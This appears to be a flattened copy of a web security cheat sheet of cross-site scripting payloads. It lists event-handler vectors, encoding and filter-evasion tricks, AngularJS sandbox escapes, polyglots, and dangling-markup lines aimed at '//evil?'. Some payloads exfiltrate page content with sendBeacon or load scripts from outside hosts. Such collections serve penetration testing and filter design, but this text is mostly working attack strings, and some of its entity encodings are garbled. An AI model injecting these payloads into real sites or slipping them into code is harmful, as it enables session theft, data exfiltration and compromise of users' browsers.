Compatibility:
onended
Fires when the resource is finished playing
Compatibility:
onerror
Fires when the resource fails to load or causes an error
<audio src/onerror=alert(1)>
Compatibility:
onfinish
Fires when the marquee finishes
Compatibility:
onfocus
Fires when the element has focus
Compatibility:
onfocusin
Fires when the element has focus
<a id=x tabindex=1 onfocusin=alert(1)></a>
Compatibility:
onfocusout
Fires when an element loses focus
<a onfocusout=alert(1)
tabindex=1 id=x></a><input autofocus>
Compatibility:
onhashchange
Fires if the hash changes
<body onhashchange="alert(1)">
Compatibility:
onload
Fires when the element is loaded
<body onload=alert(1)>
Compatibility:
onloadeddata
Fires when the first frame is loaded
Compatibility:
onloadedmetadata
Fires when the meta data is loaded
Compatibility:
onloadend
Fires when the element finishes loading
onloadstart
Fires when the element begins to load
Compatibility:
onmessage
Fires when message event is received from a postMessage call
<body onmessage=alert(1)>
Compatibility:
onpageshow
Fires when the page is shown
<body onpageshow=alert(1)>
Compatibility:
onplay
Fires when the resource is played
<audio autoplay onplay=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>
Compatibility:
onplaying
Fires the resource is playing
Compatibility:
onpopstate
Fires when the history changes
<body onpopstate=alert(1)>
Compatibility:
onprogress
Fires when the video/audio begins downloading
Compatibility:
onreadystatechange
Fires when the ready state changes
<applet
onreadystatechange=alert(1)></applet>
Compatibility:
onrepeat
Fires when a svg animation repeats
Compatibility:
onresize
Fires when the window is resized
<body onresize="alert(1)">
Compatibility:
onscroll
Fires when the page scrolls
<body onscroll=alert(1)><div
style=height:1000px></div><div id=x></div>
Compatibility:
onstart
Fires when the marquee starts
<marquee
onstart=alert(1)>XSS</marquee>
Compatibility:
ontimeupdate
Fires when the timeline is changed
Compatibility:
ontoggle
Fires when the details tag is expanded
<details ontoggle=alert(1)
open>test</details>
Compatibility:
ontransitioncancel
Fires when a CSS transition cancels
<style>:target {color:
red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
Compatibility:
ontransitionend
Fires when a CSS transition ends
<style>:target
{color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
Compatibility:
ontransitionrun
Fires when a CSS transition begins
<style>:target
{transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s"
ontransitionrun=alert(1)></xss>
Compatibility:
ontransitionstart
Fires when a CSS transition starts
<style>:target
{color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
Compatibility:
onunhandledrejection
Fires when a promise isn't handled
<body
onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
Compatibility:
onunload
Fires when the page is unloaded
<body onunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>
Compatibility:
onwaiting
Fires when while waiting for the data
Compatibility:
onwebkitanimationend
Fires when a CSS animation ends
<style>@keyframes
x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
Compatibility:
onwebkitanimationiteration
Fires when a CSS animation repeats
<style>@keyframes
slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-
count:2" onwebkitanimationiteration="alert(1)"></xss>
Compatibility:
onwebkitanimationstart
Fires when a CSS animation starts
<style>@keyframes
x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
Compatibility:
onwebkittransitionend
Fires when a CSS transition ends
<style>:target
{color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
Compatibility:
<input onauxclick=alert(1)>
Compatibility:
onbeforecopy
Requires you copy a piece of text
Compatibility:
onbeforecut
Requires you cut a piece of text
Compatibility:
onbeforepaste
Requires you paste a piece of text
Compatibility:
onchange
Requires as change of value
Compatibility:
onclick
Requires a click of the element
<xss
onclick="alert(1)">test</xss>
Compatibility:
onclose
Fires when a dialog is closed
Compatibility:
oncontextmenu
Triggered when right clicking to show the context menu
<xss
oncontextmenu="alert(1)">test</xss>
Compatibility:
oncopy
Requires you copy a piece of text
<xss oncopy=alert(1)
value="XSS" autofocus tabindex=1>test
Compatibility:
oncut
Requires you cut a piece of text
<xss oncut=alert(1)
value="XSS" autofocus tabindex=1>test
Compatibility:
ondblclick
Triggered when double clicking the element
<xss
ondblclick="alert(1)" autofocus tabindex=1>test</xss>
Compatibility:
ondrag
Triggered dragging the element
<xss draggable="true"
ondrag="alert(1)">test</xss>
Compatibility:
ondragend
Triggered dragging is finished on the element
<xss draggable="true"
ondragend="alert(1)">test</xss>
Compatibility:
ondragenter
Requires a mouse drag
<xss draggable="true"
ondragenter="alert(1)">test</xss>
Compatibility:
ondragleave
Requires a mouse drag
<xss draggable="true"
ondragleave="alert(1)">test</xss>
Compatibility:
ondragover
Triggered dragging over an element
<div draggable="true"
contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
Compatibility:
ondragstart
Requires a mouse drag
<xss draggable="true"
ondragstart="alert(1)">test</xss>
Compatibility:
ondrop
Triggered dropping a draggable element
<div draggable="true"
contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
Compatibility:
onfullscreenchange
Fires when a video changes full screen status
<video onfullscreenchange=alert(1)
src=validvideo.mp4 controls>
Compatibility:
oninput
Requires as change of value
Compatibility:
oninvalid
Requires a form submission with an element that does not satisfy its constraints
such as a required attribute.
Compatibility:
onkeydown
Triggered when a key is pressed
<xss
onkeydown="alert(1)" contenteditable>test</xss>
Compatibility:
onkeypress
Triggered when a key is pressed
<xss
onkeypress="alert(1)" contenteditable>test</xss>
Compatibility:
onkeyup
Triggered when a key is released
<xss onkeyup="alert(1)"
contenteditable>test</xss>
Compatibility:
onmousedown
Triggered when the mouse is pressed
<xss
onmousedown="alert(1)">test</xss>
Compatibility:
onmouseenter
Triggered when the mouse is hovered over the element
<xss
onmouseenter="alert(1)">test</xss>
Compatibility:
onmouseleave
Triggered when the mouse is moved away from the element
<xss
onmouseleave="alert(1)">test</xss>
Compatibility:
onmousemove
Requires mouse movement
<xss
onmousemove="alert(1)">test</xss>
Compatibility:
onmouseout
Triggered when the mouse is moved away from the element
<xss
onmouseout="alert(1)">test</xss>
Compatibility:
onmouseover
Requires a hover over the element
<xss
onmouseover="alert(1)">test</xss>
Compatibility:
onmouseup
Triggered when the mouse button is released
<xss
onmouseup="alert(1)">test</xss>
Compatibility:
onmousewheel
Fires when the mousewheel scrolls
<xss
onmousewheel=alert(1)>requires scrolling
Compatibility:
onmozfullscreenchange
Fires when a video changes full screen status
<video onmozfullscreenchange=alert(1)
src=validvideo.mp4 controls>
Compatibility:
onpagehide
Fires when the page is changed
<body
onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
Compatibility:
onpaste
Requires you paste a piece of text
Compatibility:
onpause
Requires clicking the element to pause
Compatibility:
onpointerdown
Fires when the mouse down
<xss
onpointerdown=alert(1)>XSS</xss>
Compatibility:
onpointerenter
Fires when the mouseenter
<xss
onpointerenter=alert(1)>XSS</xss>
Compatibility:
onpointerleave
Fires when the mouseleave
<xss
onpointerleave=alert(1)>XSS</xss>
Compatibility:
onpointermove
Fires when the mouse move
<xss
onpointermove=alert(1)>XSS</xss>
Compatibility:
onpointerout
Fires when the mouse out
<xss
onpointerout=alert(1)>XSS</xss>
Compatibility:
onpointerover
Fires when the mouseover
<xss
onpointerover=alert(1)>XSS</xss>
Compatibility:
onpointerrawupdate
Fires when the pointer changes
<xss
onpointerrawupdate=alert(1)>XSS</xss>
Compatibility:
onpointerup
Fires when the mouse up
<xss
onpointerup=alert(1)>XSS</xss>
Compatibility:
onreset
Requires a click
<form onreset=alert(1)><input
type=reset>
Compatibility:
onsearch
Fires when a form is submitted and the input has a type attribute of search
<form><input type=search
onsearch=alert(1) value="Hit return" autofocus>
Compatibility:
onseeked
Requires clicking the element timeline
Compatibility:
onseeking
Requires clicking the element timeline
Compatibility:
onselect
Requires you select text
<input onselect=alert(1) value="XSS" autofocus>
Compatibility:
onselectionchange
Fires when text selection is changed on the page
<body onselectionchange=alert(1)>select
some text
Compatibility:
onselectstart
Fires when beginning a text selection
Compatibility:
onshow
Fires context menu is shown
<div contextmenu=xss><p>Right
click<menu type=context id=xss onshow=alert(1)></menu></div>
Compatibility:
onsubmit
Requires a form submission
<form onsubmit=alert(1)><input
type=submit>
Compatibility:
ontouchend
Fires when the touch screen, only mobile device
<body ontouchend=alert(1)>
Compatibility:
ontouchmove
Fires when the touch screen and move, only mobile device
<body ontouchmove=alert(1)>
Compatibility:
ontouchstart
Fires when the touch screen, only mobile device
<body ontouchstart=alert(1)>
Compatibility:
onvolumechange
Requires volume adjustment
Compatibility:
onwheel
Fires when you use the mouse wheel
<body onwheel=alert(1)>
Compatibility:
Restricted characters
No parentheses using exception handling
<script>onerror=alert;throw 1</script>
Frameworks
Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>
Protocols
Iframe src attribute JavaScript protocol
<iframe src="javascript:alert(1)">
Characters \x09,\x0a,\x0d are allowed after protocol name before the colon
<a href="javascript :alert(1)">XSS</a>
Click a submit element from anywhere on the page, even outside the form
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: Access key attributes can enable XSS on normally unexploitable
elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows)
(CTRL+ALT+X on OS X)
Link elements: Access key attributes can enable XSS on normally unexploitable
elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows)
(CTRL+ALT+X on OS X)
Special tags
Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Disable referer
<meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC
%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes
<script>\u0061lert(1)</script>
Octal encoding
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
HTML entities
<a href="javascript:alert(1)">XSS</a> <a href="java	script:alert(1)">XSS</a> <a
href="java
script:alert(1)">XSS</a> <a
href="javascript:alert(1)">XSS</a>
URL encoding
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
Obfuscation
Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64 and HTML entities
<script
src=data:text/javascript;base64,YWxlcnQoM
Sk=></script>
Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></
script>
All versions
Mario Heiderich (Cure53) & Sebastian Lekies (Google) Eduardo Vela
Nava (Google) Krzysztof Kotowicz (Google)
62
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions
Gareth Heyes (PortSwigger)
39
<x v-html=_c.constructor('alert(1)')()>
All versions
Peter af Geijerstam (Swedish Shellcode Factory)
37
<x v-if=_c.constructor('alert(1)')()>
1.2.0 - 1.2.1
Jan Horn (Google)
122
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).
value,0,'alert(1)')()}}
1.2.2 - 1.2.5
Gareth Heyes (PortSwigger)
23
{{{}.")));alert(1)//"}}
1.2.6 - 1.2.18
Jan Horn (Google)
106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')
()}}
1.2.19 - 1.2.23
Mathias Karlsson (Detectify)
124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29
Gareth Heyes (PortSwigger)
23
{{{}.")));alert(1)//"}}
1.2.27-1.2.29/1.3.0-1.3.20
Gareth Heyes (PortSwigger)
23
{{{}.")));alert(1)//"}}
1.3.0
Gábor Molnár (Google)
272
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a =
apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' +
'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
1.3.3 - 1.3.18
Gareth Heyes (PortSwigger)
128
{{{}[{toString:
[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//');}}
1.3.19
Gareth Heyes (PortSwigger)
102
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20
Gareth Heyes (PortSwigger)
65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9
Gareth Heyes (PortSwigger)
74
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8
Ian Hickey & Gareth Heyes (PortSwigger)
79
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11
Jan Horn (Google)
517
{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$
$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.
$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,
$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
>=1.6.0
Mario Heiderich (Cure53)
41
{{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter)
Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)
33
{{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.18
Jan Horn (Google)
118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).va
lue,0,'alert(1)')()
1.2.19 - 1.2.23
Mathias Karlsson (Detectify)
119
toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26
Gareth Heyes (PortSwigger)
317
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}
[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]
['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',
{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27-1.2.29/1.3.0-1.3.20
Gareth Heyes (PortSwigger)
20
{}.")));alert(1)//";
1.4.0-1.4.5
Gareth Heyes (PortSwigger)
75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0
Mario Heiderich (Cure53)
37
constructor.constructor('alert(1)')()
1.2.0 - 1.5.0
Eduardo Vela (Google)
190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key,
value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1);
}}</div></div></div>
All versions (Chrome) shorter via oncut
Savan Gadhiya (NotSoSecure)
49
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil?
<table><tbody background="//evil? <table><tfoot background="//evil? <table><td
background="//evil? <table><th background="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/
[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></
script><html \" onmouseover=/*<svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/
onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(window)
';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]
("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(self)
';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(this)
';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)
';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(parent)
';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]
("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(frames)
';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]
("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(globalThis)
';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\
x62"]("WFNT"))');//
Impossible labs
Title Description Length Closest vector Link
limit
Basic context, This lab captures the scenario when N/A N/A 🔗
WAF blocks you can't use an open tag followed by
<[a-zA-Z] an alphanumeric character.
Sometimes you can solve this problem
by bypassing the WAF entirely, but
what about when that's not an option?
Certain versions of .NET have this
behaviour, and it's only known to be
exploitable in old IE with <%tag.
Script based We often encounter this situation in N/A N/A 🔗
injection but the wild: you have an injection inside
quotes, a JavaScript variable and can inject
forward slash angle brackets, but quotes and
and backslash forward/backslashes are escaped so
are escaped you can't simply close the script
block.
Safari used to allow any tag to have a onload event inside SVG
<svg><xss onload=alert(1)>
Credits
This cheat sheet wouldn't be possible without the web security community who
share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo
Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias
Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a,
Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan,
Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal
Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof
Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di
Paola, Roman Shafigullin, Lewis Ardern, Michał
Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin
Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł
Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan,
p4fg, diofeher
You can contribute to this cheat sheet by creating a new issue or updating the
JSON and creating a pull request
javascript:/*--></title></style></textarea></script></
xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Image XSS using the JavaScript directive
Image XSS using the JavaScript directive (IE7.0 doesn’t support
the JavaScript directive in context of an image, but it does in other
contexts, but the following show the principles that would work in
other tags as well:
<IMG SRC="javascript:alert('XSS');">
No quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>
Case insensitive XSS attack vector
<IMG SRC=JaVaScRiPt:alert('XSS')>
HTML entities
The semicolons are required for this to work:
<IMG SRC=javascript:alert("XSS")>
Grave accent obfuscation
If you need to use both double and single quotes you can use a
grave accent to encapsulate the JavaScript string - this is also
useful because lots of cross site scripting filters don’t know about
grave accents:
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Malformed A tags
Skip the HREF attribute and get to the meat of the XXS…
Submitted by David Cross ~ Verified on Chrome
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
or Chrome loves to replace missing quotes for you… if you ever get
stuck just leave them off and Chrome will put them in the right
place and fix your missing quotes on a URL or script.
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
Malformed IMG tags
Originally found by Begeek (but cleaned up and shortened to work
in all browsers), this XSS vector uses the relaxed rendering engine
to create our XSS vector within an IMG tag that should be
encapsulated within quotes. I assume this was originally meant to
correct sloppy coding. This would make it significantly more difficult
to correctly parse apart an HTML tags:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
fromCharCode
If no quotes of any kind are allowed you can eval() a
fromCharCode in JavaScript to create any XSS vector you need:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Default SRC tag to get past filters that check SRC domain
This will bypass most SRC domain filters. Inserting javascript in an
event method will also apply to any HTML tag type injection that
uses elements like Form, Iframe, Input, Embed etc. It will also allow
any relevant event for the tag type to be substituted
like onblur, onclick giving you an extensive amount of variations
for many injections listed here. Submitted by David Cross .
Edited by Abdullah Hussam(@Abdulahhusam).
<IMG SRC=# onmouseover="alert('xxs')">
Default SRC tag by leaving it empty
<IMG SRC= onmouseover="alert('xxs')">
Default SRC tag by leaving it out entirely
<IMG onmouseover="alert('xxs')">
On error alert
<IMG SRC=/
onerror="alert(String.fromCharCode(88,83,83))"></img>
IMG onerror and javascript alert encode
<img src=x
onerror="javasc
ript:al
ert('XS
S')">
Decimal HTML character references
All of the XSS examples that use a javascript: directive inside of
an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko
rendering engine mode).
<IMG SRC=javascrip
16;:alert('XSS&
#39;)>
Decimal HTML character references without trailing semicolons
This is often effective in XSS that attempts to look for “&#XX;”,
since most people don’t know about padding - up to 7 numeric
characters total. This is also useful against people who decode
against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which
incorrectly assumes a semicolon is required to terminate a html
encoded string (I’ve seen this in the wild):
<IMG SRC=javasc
ript:al
ert('XS
S')>
Hexadecimal HTML character references without trailing semicolons
This is also a viable XSS attack against the above string
$tmp_string=~ s/.*\&#(\d+);.*/$1/; which assumes that there is a
numeric character following the pound symbol - which is not true
with hex HTML characters).
<IMG
SRC=javascript:
1lert('XSS')>
Embedded tab
Used to break up the cross site scripting attack:
<IMG SRC="jav ascript:alert('XSS');">
Embedded Encoded tab
Use this one to break up XSS :
<IMG SRC="jav	ascript:alert('XSS');">
Embedded newline to break up XSS
Some websites claim that any of the chars 09-13 (decimal) will
work for this attack. That is incorrect. Only 09 (horizontal tab), 10
(newline) and 13 (carriage return) work. See the ascii chart for
more details. The following four XSS examples illustrate this vector:
<IMG SRC="jav
ascript:alert('XSS');">
Embedded carriage return to break up XSS
(Note: with the above I am making these strings longer than they
have to be because the zeros could be omitted. Often I’ve seen
filters that assume the hex and dec encoding has to be two or three
characters. The real rule is 1-7 characters.):
<IMG SRC="jav
ascript:alert('XSS');">
Null breaks up JavaScript directive
Null chars also work as XSS vectors but not like above, you need
to inject them directly using something like Burp Proxy or
use %00 in the URL string or if you want to write your own injection
tool you can either use vim (^V^@ will produce a null) or the
following program to generate it into a text file. Okay, I lied again,
older versions of Opera (circa 7.11 on Windows) were vulnerable to
one additional char 173 (the soft hypen control char). But the null
char %00 is much more useful and helped me bypass certain real
world filters with a variation on this example:
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Spaces and meta chars before the JavaScript in images for XSS
This is useful if the pattern match doesn’t take into account spaces
in the word javascript: -which is correct since that won’t render-
and makes the false assumption that you can’t have a space
between the quote and the javascript: keyword. The actual
reality is you can have any char from 1-32 in decimal:
<IMG SRC="  javascript:alert('XSS');">
Non-alpha-non-digit XSS
The Firefox HTML parser assumes a non-alpha-non-digit is not
valid after an HTML keyword and therefor considers it to be a
whitespace or non-valid token after an HTML tag. The problem is
that some XSS filters assume that the tag they are looking for is
broken up by whitespace. For example \<SCRIPT\\s != \
<SCRIPT/XSS\\s:
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
Based on the same idea as above, however,expanded on it, using
Rnake fuzzer. The Gecko rendering engine allows for any
character other than letters, numbers or encapsulation chars (like
quotes, angle brackets, etc…) between the event handler and the
equals sign, making it easier to bypass cross site scripting blocks.
Note that this also applies to the grave accent char as seen here:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Yair Amit brought this to my attention that there is slightly different
behavior between the IE and Gecko rendering engines that allows
just a slash between the tag and the parameter with no spaces.
This could be useful if the system does not allow spaces.
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
Extraneous open brackets
Submitted by Franz Sedlmaier, this XSS vector could defeat certain
detection engines that work by first using matching pairs of open
and close angle brackets and then by doing a comparison of the
tag inside, instead of a more efficient algorythm like Boyer-Moore
that looks for entire string matches of the open angle bracket and
associated tag (post de-obfuscation, of course). The double slash
comments out the ending extraneous bracket to supress a
JavaScript error:
<<SCRIPT>alert("XSS");//\<</SCRIPT>
No closing script tags
In Firefox and Netscape 8.1 in the Gecko rendering engine mode
you don’t actually need the \></SCRIPT> portion of this Cross Site
Scripting vector. Firefox assumes it’s safe to close the HTML tag
and add closing tags for you. How thoughtful! Unlike the next one,
which doesn’t effect Firefox, this does not require any additional
HTML below it. You can add quotes if you need to, but they’re not
needed generally, although beware, I have no idea what the HTML
will end up looking like once this is injected:
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
Protocol resolution in script tags
This particular variant was submitted by Łukasz Pilorz and was
based partially off of Ozh’s protocol resolution bypass below. This
cross site scripting example works in IE, Netscape in IE rendering
mode and Opera if you add in a </SCRIPT> tag at the end.
However, this is especially useful where space is an issue, and of
course, the shorter your domain, the better. The “.j” is valid,
regardless of the encoding type because the browser knows it in
context of a SCRIPT tag.
<SCRIPT SRC=//xss.rocks/.j>
Half open HTML/JavaScript XSS vector
Unlike Firefox the IE rendering engine doesn’t add extra data to
you page, but it does allow the javascript: directive in images. This
is useful as a vector because it doesn’t require a close angle
bracket. This assumes there is any HTML tag below where you are
injecting this cross site scripting vector. Even though there is no
close “>” tag the tags below it will close it. A note: this does mess
up the HTML, depending on what HTML is beneath it. It gets
around the following NIDS regex: /((\\%3D)|(=))\[^\\n\]\
*((\\%3C)|\<)\[^\\n\]+((\\%3E)|\>)/ because it doesn’t
require the end “>”. As a side note, this was also affective against a
real world XSS filter I came across using an open
ended <IFRAME tag instead of an <IMG tag:
<IMG SRC="`<javascript:alert>`('XSS')"
Double open angle brackets
Using an open angle bracket at the end of the vector instead of a
close angle bracket causes different behavior in Netscape Gecko
rendering. Without it, Firefox will work but Netscape won’t:
<iframe src=http://xss.rocks/scriptlet.html <
Escaping JavaScript escapes
When the application is written to output some user information
inside of a JavaScript like the following: <SCRIPT>var
a="$ENV{QUERY\_STRING}";</SCRIPT> and you want to inject
your own JavaScript into it but the server side application escapes
certain quotes you can circumvent that by escaping their escape
character. When this gets injected it will read <SCRIPT>var
a="\\\\";alert('XSS');//";</SCRIPT> which ends up un-
escaping the double quote and causing the Cross Site Scripting
vector to fire. The XSS locator uses this method.:
\";alert('XSS');//
An alternative, if correct JSON or Javascript escaping has been
applied to the embedded data but not HTML encoding, is to finish
the script block and start your own:
</script><script>alert('XSS');</script>
End title tag
This is a simple XSS vector that closes <TITLE> tags, which can
encapsulate the malicious cross site scripting attack:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
IMG lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
List-style-image
Fairly esoteric issue dealing with embedding images for bulleted
lists. This will only work in the IE rendering engine because of the
JavaScript directive. Not a particularly useful cross site scripting
vector:
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</
STYLE><UL><LI>XSS</br>
VBscript in an image
<IMG SRC='vbscript:msgbox("XSS")'>
Livescript (older versions of Netscape only)
<IMG SRC="livescript:[code]">
SVG object tag
<svg/onload=alert('XSS')>
ECMAScript 6
Set.constructor`alert\x28document.domain\x29```
BODY tag
Method doesn’t require using any variants
of javascript: or <SCRIPT... to accomplish the XSS attack).
Dan Crowley additionally noted that you can put a space before the
equals sign (onload= != onload =):
<BODY ONLOAD=alert('XSS')>
Event Handlers
It can be used in similar XSS attacks to the one above (this is the
most comprehensive list on the net, at the time of this writing).
Thanks to Rene Ledosquet for the HTML+TIME updates.
The Dottoro Web Reference also has a nice list of events in
JavaScript.
BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
& JavaScript includes
<BR SIZE="&{alert('XSS')}">
STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Remote style sheet
Using something as simple as a remote style sheet you can include
your XSS as the style parameter can be redefined using an
embedded expression. This only works in IE and Netscape 8.1+ in
IE rendering engine mode. Notice that there is nothing on the page
to show that there is included JavaScript. Note: With all of these
remote style sheet examples they use the body tag, so it won’t
work unless there is some content on the page other than the
vector itself, so you’ll need to add a single letter to the page to
make it work if it’s an otherwise blank page:
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
Remote style sheet part 2
This works the same as above, but uses a <STYLE> tag instead of
a <LINK> tag). A slight variation on this vector was used to hack
Google Desktop. As a side note, you can remove the
end </STYLE> tag if there is HTML immediately after the vector to
close it. This is useful if you cannot have either an equals sign or a
